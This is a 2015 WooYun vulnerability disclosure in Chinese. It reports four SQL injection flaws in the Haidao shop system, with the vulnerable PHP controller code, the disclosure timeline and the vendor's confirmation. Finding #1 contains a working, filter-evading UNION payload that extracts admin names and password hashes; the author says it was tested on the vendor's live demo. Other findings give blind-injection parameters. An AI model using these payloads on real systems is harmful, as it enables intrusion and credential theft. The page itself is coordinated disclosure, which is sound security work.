当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140025

漏洞标题:Haidao网店系统 最新版 4处sql注入打包

相关厂商:www.haidao.la

漏洞作者: 路人甲

提交时间:2015-09-10 14:43

修复时间:2015-12-10 12:42

公开时间:2015-12-10 12:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-14: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

v1.12.3.150828
注入打包。官网demo测试

详细说明:

#1
/www/appliaction/Controller/User/OrderController.class.php

public function detail() {
extract($_GET);
$rs = $this->getInfo($order_sn);
if(!$rs) {
showmessage($this->errMsg);
}
$delivery = $rs['_delivery'];
$_config = $this->_config[$rs['pay_type']];
$tracks = model('order_track')->fetch_all_by_order_sn($order_sn);
$SEO = seo(0, '订单详情');
include template('order_detail');
}


extract($_GET) 后 getInfo($order_sn)
跟到 getInfo

private function getInfo($order_sn = '') {
if(empty($order_sn)) {
$this->errMsg = '参数错误';
return FALSE;
}
$sqlmap = array();
$sqlmap['user_id'] = $this->userid;
$sqlmap['order_sn'] = $order_sn;
$rs = $this->db->where($sqlmap)->find();


没有过滤带入了查询。
官网测试下
http://demo.haidao.la/index.php?m=user&c=Order&a=detail
post:

order_sn[0]=%3d1) UNION /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,(/*!50000select*/name%0a/*!50000from*/hd_admin_user limit 1),(/*!50000select*/password%0a/*!50000from*/hd_admin_user limit 1),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%23in


h1.jpg


#2
/appliaction/Controller/Goods/CartController.class.php

public function update() {
extract($_GET);
$result = $this->Cart->updateItem($timestamp, $num);
if(!$result) {
showmessage('购物车更新失败');
} else {
showmessage('购物车更新成功', U('index'), 1);
}
}
public function updateItem($timestamp, $num) {
if(empty($timestamp)) return FALSE;
$num = $num;
if ($this->uid) {
$sqlmap = array();
$sqlmap['user_id'] = $this->uid;
$sqlmap['key'] = $timestamp;
if($num > 0) {

$this->cart_db->where($sqlmap)->setField('num', $num);
} else {
$this->cart_db->where($sqlmap)->delete();
}
} else {
$all_item = json_decode(cookie('Cart'), TRUE);
if (!$all_item || !$all_item[$timestamp]) return FALSE;
if($num > 0) {
list($goods_id, $product_id, $number) = str2arr($all_item[$timestamp]);
$all_item[$timestamp] = $goods_id.','.$product_id.','.$num;
cookie('Cart', json_encode($all_item));
} else {
unset($all_item[$timestamp]);
}
}
$this->getAll();
return TRUE;
}


盲注。
http://localhost:801/index.php?m=Goods&c=cart&a=update
post:
timestamp[0]=xxxxxin&num=1

h1.png


#3
/appliaction/Controller/User/OrderController.class.php

public function comment() {
extract($_GET);
$rs = $this->getInfo($order_sn);
......


http://demo.haidao.la/index.php?m=user&c=Order&a=comment
post: order_sn 参数
也是个盲注
#4
/appliaction/Controller/User/OrderReturnController.class.php

public function order_return() {
extract($_GET);
$order_info = $this->getInfo($order_sn);...
private function getInfo($order_sn = '') {
if(empty($order_sn)) {
$this->errMsg = '参数错误';
return FALSE;
}
$sqlmap = array();
$sqlmap['user_id'] = $this->userid;
$sqlmap['order_sn'] = $order_sn;
$rs = $this->order_db->where($sqlmap)->find();...


http://localhost:801/index.php?m=user&c=OrderReturn&a=order_return
order_sn参数。 同上。
盲注的测试脚本 见http://**.**.**.**/bugs/wooyun-2015-0136380 改下就好了。

漏洞证明:

h1.jpg


h1.png

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-11 12:41

厂商回复:

感谢对海盗云商的关注,我们会尽快修复!

最新状态:

暂无


漏洞评价:

评价